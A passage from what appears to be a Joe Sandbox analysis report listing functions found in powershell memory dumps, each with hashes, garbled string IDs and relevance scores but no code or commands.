                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4']q$4']q$x.]k$x.]k
                                                                                  • API String ID: 0-2553876878
                                                                                  • Opcode ID: b63226d4290ef7c9263c3ef36f20402d4f0773fbc3fd48d9b1b2f6058fd307f4
                                                                                  • Instruction ID: 065a83434f8f7915e928a34c8fa78ce0605154dc93ff5b524ce7581076dd9fe9
                                                                                  • Opcode Fuzzy Hash: b63226d4290ef7c9263c3ef36f20402d4f0773fbc3fd48d9b1b2f6058fd307f4
                                                                                  • Instruction Fuzzy Hash: 93024FB4A40215DFD724DB28C990BEEBBB2EF85304F1085E5D909AB355CB729E81CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775E808 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$4']q$4']q$x.]k$x.]k$-]k
                                                                                  • API String ID: 0-892497704
                                                                                  • Opcode ID: e0dbc9f5fa5b83f20ea72ee3d63209e37bbbb9cbd5a9a91cf3fba0dd29decfc9
                                                                                  • Instruction ID: 8febf7124d9b7d39d231a43069b5f3e82866909a0091ad6f85e845f0fa29da1d
                                                                                  • Opcode Fuzzy Hash: e0dbc9f5fa5b83f20ea72ee3d63209e37bbbb9cbd5a9a91cf3fba0dd29decfc9
                                                                                  • Instruction Fuzzy Hash: B2E183B0B402149FD724DB68C995BEEBBA2EF84304F108499D9099F395CB76DE81CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07750638 Relevance: 7.8, Strings: 6, Instructions: 333COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-1480752206
                                                                                  • Opcode ID: adc057a7665612e3172db920ef7d735ef0a39e6250fcf64f52baa0a5c200cb9c
                                                                                  • Instruction ID: d95a2230651472cc3b68d063fa35ed73bda7b6e96da382052a4bcf642d79678d
                                                                                  • Opcode Fuzzy Hash: adc057a7665612e3172db920ef7d735ef0a39e6250fcf64f52baa0a5c200cb9c
                                                                                  • Instruction Fuzzy Hash: 7AB14AB1B04206DFDB148F788550A7ABBE6EFC1394F18887BDC048B255DBB1D845C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775A2EA Relevance: 6.5, Strings: 5, Instructions: 274COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$x.]k$-]k
                                                                                  • API String ID: 0-1455051235
                                                                                  • Opcode ID: 9d659fb1149c742c31f65555c1ae057a36360c7801ee6b12851076d8e6930826
                                                                                  • Instruction ID: ba8d1b1dd52191bc7642fff91dc20375a31cb910acfa858fa8c9408efd2d251f
                                                                                  • Opcode Fuzzy Hash: 9d659fb1149c742c31f65555c1ae057a36360c7801ee6b12851076d8e6930826
                                                                                  • Instruction Fuzzy Hash: 89B1AFB4A002058FC714CFA8C551BAEBFB2EF88344F16C669D9056F355CBB6D846CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07757D53 Relevance: 4.3, Strings: 3, Instructions: 562COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll
                                                                                  • API String ID: 0-1022118942
                                                                                  • Opcode ID: 79c554f0e1e5420559e73cacc932b070ec3907f3afbc6a3fcd5f131f448c10c2
                                                                                  • Instruction ID: 7cfb88c0978e43c6a95e37fbb416ea70db2dd9ef036985ed30a7fea3d7866400
                                                                                  • Opcode Fuzzy Hash: 79c554f0e1e5420559e73cacc932b070ec3907f3afbc6a3fcd5f131f448c10c2
                                                                                  • Instruction Fuzzy Hash: 6A3239B4A00205CFDB14CF98C581EA9BBB2FB84354F25C559D9099F355CBB2EC46CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077584E5 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll
                                                                                  • API String ID: 0-1022118942
                                                                                  • Opcode ID: 7c5c05af4ddfb4b77deb118720d3714cafdfa41aa252ce31df7a317951d8e498
                                                                                  • Instruction ID: 4ee8d1294195cfec1e4e4b2d67a5c3604f8322b2c14174f3a29ae13755976333
                                                                                  • Opcode Fuzzy Hash: 7c5c05af4ddfb4b77deb118720d3714cafdfa41aa252ce31df7a317951d8e498
                                                                                  • Instruction Fuzzy Hash: 2C1249B4A00205DFDB14CF98C581EAABBB2FB84354F24C959D9099F355CBB2EC45CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07756235 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$tP]q
                                                                                  • API String ID: 0-3055551845
                                                                                  • Opcode ID: a71a4103490d4ce098e0dcc39fb6251654c23cfa958f51630f3823e355c96cc2
                                                                                  • Instruction ID: 7aa3a34c0989208631274a1b2909b491c4c822d4571d157448ca182714bf1336
                                                                                  • Opcode Fuzzy Hash: a71a4103490d4ce098e0dcc39fb6251654c23cfa958f51630f3823e355c96cc2
                                                                                  • Instruction Fuzzy Hash: E65145B0609342DFC712CB68C850A65BFB1AF82750F59C8ABD944CF192DBB1DC46C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07750619 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q
                                                                                  • API String ID: 0-127220927
                                                                                  • Opcode ID: 04db09b70538622a71bb4dc582cdd637cb9d8a385f4b48c5f2d33bfcf72bcd7a
                                                                                  • Instruction ID: 255de8b93a8621b00b93071c120947d1109c64f3823bcf06d34b5894a65ebc54
                                                                                  • Opcode Fuzzy Hash: 04db09b70538622a71bb4dc582cdd637cb9d8a385f4b48c5f2d33bfcf72bcd7a
                                                                                  • Instruction Fuzzy Hash: E211C4B6308247CFD7158F34C940A21BBB1EFC2398B29869BDD449B252D7B2C800CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077508C2 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q
                                                                                  • API String ID: 0-1007455737
                                                                                  • Opcode ID: a0d631ca2f234e0114cbdb73b5b09be35bea362285402212a5dee3240a99ea7e
                                                                                  • Instruction ID: 449f08df48a604e1f801f9cb783695c3b682aed3ce97c6f3c2cb2aa20584ff56
                                                                                  • Opcode Fuzzy Hash: a0d631ca2f234e0114cbdb73b5b09be35bea362285402212a5dee3240a99ea7e
                                                                                  • Instruction Fuzzy Hash: 2D8148B57043469FDB158F3888506BABBB5EFC2390F24886BDC84CB651CB71C845C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775A72E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x.]k
                                                                                  • API String ID: 0-1751754572
                                                                                  • Opcode ID: dd96b2e929a1b83f7309e1402d58becfbc1493f6600283cfc2be2c0f2f7e68bd
                                                                                  • Instruction ID: 059d7ade62668ca628b8bc7f22471bebee0b06e8f2ce078cbf83e02d2c0c8a59
                                                                                  • Opcode Fuzzy Hash: dd96b2e929a1b83f7309e1402d58becfbc1493f6600283cfc2be2c0f2f7e68bd
                                                                                  • Instruction Fuzzy Hash: C331B7B47402049BD7049B78C951BAF7AA3EF84340F11C429E9016F391CFB69C46CBD2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07752C55 Relevance: .1, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8595159ed42aeaede456a3c5719d0c7a3cf62a404ee33ab3f1e22693bff1925
                                                                                  • Instruction ID: 605241ec0a8bf24ede2d6148985cfcb06394f02ea89d884eb43be7d4d84f167b
                                                                                  • Opcode Fuzzy Hash: e8595159ed42aeaede456a3c5719d0c7a3cf62a404ee33ab3f1e22693bff1925
                                                                                  • Instruction Fuzzy Hash: B341A0F27003418BCB15977845516BABBD2EFD1364B2488AECD01CF253DAB2CD06C7A6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077560BC Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cde6f1f9379c7c0471a1246322537cbf6d451fa5bdb9df4b3e4f25e3772ceeea
                                                                                  • Instruction ID: 74bafe6fc99ae9f3613127da6e9b4846b61420d8865981eb5a0902d2b9a297f3
                                                                                  • Opcode Fuzzy Hash: cde6f1f9379c7c0471a1246322537cbf6d451fa5bdb9df4b3e4f25e3772ceeea
                                                                                  • Instruction Fuzzy Hash: 94F034B86093819FDB028B108950D60FB71AB47789B49C4DBD8488F1A3C3A6D84ADB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 090E0000 Relevance: .0, Instructions: 7COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2423592720.00000000090E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_90e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6bfb88fef8e8f4e1d611543756ea16d91047ac5e2958a069f844c5beafbc5059
                                                                                  • Instruction ID: e9147dd1a8c3c81a61d98b8a8a52bab2c4f202d205c00f7efa7d91e813955b28
                                                                                  • Opcode Fuzzy Hash: 6bfb88fef8e8f4e1d611543756ea16d91047ac5e2958a069f844c5beafbc5059
                                                                                  • Instruction Fuzzy Hash: AFA0020E2DD9971659117DB925142DAEA3AD95235275818E091889445991188CEA83A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775D04A Relevance: 19.2, Strings: 15, Instructions: 422COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$84jl$84jl$84jl$XRbq$XRbq$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-1076045294
                                                                                  • Opcode ID: b43eca2926378187912bb287269f4bc9808211e8be3fac74932eac2cb3b01de6
                                                                                  • Instruction ID: cbaae8a6e6a825982fd63df69e8889391d3e52e8c90040fa5d273030925d0ffa
                                                                                  • Opcode Fuzzy Hash: b43eca2926378187912bb287269f4bc9808211e8be3fac74932eac2cb3b01de6
                                                                                  • Instruction Fuzzy Hash: F7E1D7B0700206DFDB35DF68C5847AABBB2EF85390F1588A5EC059B295CBB1DC41CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775D958 Relevance: 13.0, Strings: 10, Instructions: 479COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$x.]k$-]k
                                                                                  • API String ID: 0-3688766903
                                                                                  • Opcode ID: ed956b26db69df02ecab4ffcff75489ee20339e64002a17863e17f7e05c43ac8
                                                                                  • Instruction ID: 2026bae3b70dadeb095773ffb8cc768738d7180f0da7208de6bcb1ec61011d3c
                                                                                  • Opcode Fuzzy Hash: ed956b26db69df02ecab4ffcff75489ee20339e64002a17863e17f7e05c43ac8
                                                                                  • Instruction Fuzzy Hash: C6126CB0B042199FDB24DF28C990BEABBB2FF85304F1085A5D9099B355CB719E85CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077527E0 Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$bl$bl
                                                                                  • API String ID: 0-3597631728
                                                                                  • Opcode ID: 3b0981cf96df42d95eb83e41d121c49bf9debd5e9b2ba70e54756196d6afd14d
                                                                                  • Instruction ID: 9c7144a066a7a925d4e125a55a65bdb1f353f45ee6a635809a139a25515a09b9
                                                                                  • Opcode Fuzzy Hash: 3b0981cf96df42d95eb83e41d121c49bf9debd5e9b2ba70e54756196d6afd14d
                                                                                  • Instruction Fuzzy Hash: B1A154F13083458FDB259B698810676BBE5BF867A0F18887ADC45CB393DAB1D845C3A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07754CB8 Relevance: 12.8, Strings: 10, Instructions: 316COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-2309685269
                                                                                  • Opcode ID: 698ae185a00aefafee03004be1b41341e1209c83f5f093161638a16bb7613424
                                                                                  • Instruction ID: 5149e9671d675df648d8b14b381390a32ca61f24fe917c6f1b68c458a617df95
                                                                                  • Opcode Fuzzy Hash: 698ae185a00aefafee03004be1b41341e1209c83f5f093161638a16bb7613424
                                                                                  • Instruction Fuzzy Hash: C7A16BB1B002459FCB289F68C4506AABBE2EF85750F14C96ADD058B254DFB2DC91CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07752218 Relevance: 10.3, Strings: 8, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $ak$,Sll$,Sll$p5\k$tP]q$tP]q$xSll$xSll
                                                                                  • API String ID: 0-2196491867
                                                                                  • Opcode ID: 817b5bcc73581642c7db92ff7025c5b53585dc8320ba172dd5805ab158d30ec8
                                                                                  • Instruction ID: e9a35c8ce45cff885c2ada06b36899034fc8d6f0fc88daeec94ea2a63487397e
                                                                                  • Opcode Fuzzy Hash: 817b5bcc73581642c7db92ff7025c5b53585dc8320ba172dd5805ab158d30ec8
                                                                                  • Instruction Fuzzy Hash: 018169F1B043459FC7208B6888117AABFE5FF86350F14C46ADD09CB252DAB1DC41C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775D430 Relevance: 10.2, Strings: 8, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$84jl$XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                                                                                  • API String ID: 0-1926884809
                                                                                  • Opcode ID: 88ea3080e5db11ef2d815bbc9759c902e281a7ba5375005cf95bde56b2b3cdc7
                                                                                  • Instruction ID: e695ac1cf9cffe6778a115a6890ccfd2a3293a9e9592d6d636011a7e4a08d80b
                                                                                  • Opcode Fuzzy Hash: 88ea3080e5db11ef2d815bbc9759c902e281a7ba5375005cf95bde56b2b3cdc7
                                                                                  • Instruction Fuzzy Hash: 7661F970B001059FDB249F68C480AAAB7E2EFC9755F14C969DC059F395CBB1DD41CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775C654 Relevance: 10.2, Strings: 8, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$84jl$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-2027158854
                                                                                  • Opcode ID: 96e8fb90ccfa3f3aba98b885624a90765aca80e0308f45ea77ffa845a2f15194
                                                                                  • Instruction ID: f3cdc2e25bb34a5da2fef512d8d1f2aa4e8f3919deab0f0d8d3dd7df7c3e2d1c
                                                                                  • Opcode Fuzzy Hash: 96e8fb90ccfa3f3aba98b885624a90765aca80e0308f45ea77ffa845a2f15194
                                                                                  • Instruction Fuzzy Hash: 785195B4A00307DFDB268F14C5447B6B7E2EF45391F19886AEC059B690D7B1E940CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775EF4A Relevance: 6.5, Strings: 5, Instructions: 222COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$x.]k$-]k
                                                                                  • API String ID: 0-1455051235
                                                                                  • Opcode ID: 709c634d5edf8de0409c77a0f5f775138e1ab70306ae68b96b7b5af5929c3a8a
                                                                                  • Instruction ID: 0fd13025857dd88f05efcfb59b625fa1aa6269b5cbc0c49a3d246cb4a85b62ba
                                                                                  • Opcode Fuzzy Hash: 709c634d5edf8de0409c77a0f5f775138e1ab70306ae68b96b7b5af5929c3a8a
                                                                                  • Instruction Fuzzy Hash: 1EA16DB0A402198FDB64DB28C951BEEB7B2FB49304F1084D5D9096B385CB76DE85CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775CDF1 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$84jl$tP]q$tP]q$$]q
                                                                                  • API String ID: 0-4200142483
                                                                                  • Opcode ID: f49dcac2f193425a62419d2235f2f02ac547d3fa3afbfff01eadc9356dd7ee49
                                                                                  • Instruction ID: 3f1a6b376f0bd353ccff76e39db57b604e5377dc887547656cbb2dfbe1cf64cf
                                                                                  • Opcode Fuzzy Hash: f49dcac2f193425a62419d2235f2f02ac547d3fa3afbfff01eadc9356dd7ee49
                                                                                  • Instruction Fuzzy Hash: 6651E471B002069FD7169F68C450BAEB7E2EF84751F14C869EC059B295CBB1DD41CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07754C9D Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-2702571027
                                                                                  • Opcode ID: abdcb0e2b66ad7c7030ff3b8184072ce2745048b1a59a0279487b823325f820e
                                                                                  • Instruction ID: 84915227151858dada486faf16fcd7612f6fdc0004f8943d1392f67018902691
                                                                                  • Opcode Fuzzy Hash: abdcb0e2b66ad7c7030ff3b8184072ce2745048b1a59a0279487b823325f820e
                                                                                  • Instruction Fuzzy Hash: 4E4136B1A04385EFDB258F14C544B66BBF1AF857A0F18C8AADD058B291C7B2DCD0CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775C498 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                  • API String ID: 0-2353078639
                                                                                  • Opcode ID: f00d070be086b3b4b6f7fb39fe20d5f7b785691f19a9ee6bfdf889a9e6414514
                                                                                  • Instruction ID: 96273ed0fa37c57d12a38379f7e601f6f05a2b5892de7fda3115ada0e5a066e0
                                                                                  • Opcode Fuzzy Hash: f00d070be086b3b4b6f7fb39fe20d5f7b785691f19a9ee6bfdf889a9e6414514
                                                                                  • Instruction Fuzzy Hash: A84125B1B0030B8FCB264FA9954077ABBE9AF85690F34487ADC05CB205DAB5C905C7B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077500F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$bl$bl
                                                                                  • API String ID: 0-640543057
                                                                                  • Opcode ID: b6b562a05a34aaff0775f9c7a923bf76659bdba94ef5dc0339e0e0dacd258fc8
                                                                                  • Instruction ID: e558c910f63a88e3c858aa484a053f00f30f1aea401dd76d0d61752b22cd8e45
                                                                                  • Opcode Fuzzy Hash: b6b562a05a34aaff0775f9c7a923bf76659bdba94ef5dc0339e0e0dacd258fc8
                                                                                  • Instruction Fuzzy Hash: E5110B753003069BEB245B3E9814B6FB7AABFC17E1F248C2AEC4987351E9B5C445C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775BAE8 Relevance: 5.5, Strings: 4, Instructions: 490COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (o]q$(o]q$(o]q$(o]q
                                                                                  • API String ID: 0-1261621458
                                                                                  • Opcode ID: 35291aaabe8fe8c5882341b3cbcdb8719ec8bd7c29e04cf41bda1372b7ce0ba5
                                                                                  • Instruction ID: 47788717bf8f9061c35cdd2db528e952ac4a438b28f2e3dba1baf5dce1ac7513
                                                                                  • Opcode Fuzzy Hash: 35291aaabe8fe8c5882341b3cbcdb8719ec8bd7c29e04cf41bda1372b7ce0ba5
                                                                                  • Instruction Fuzzy Hash: C3F136F0704346DFDB159F68C8507BABBA2FF85351F18886AE905CB2A1CBB1D845CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07759BED Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
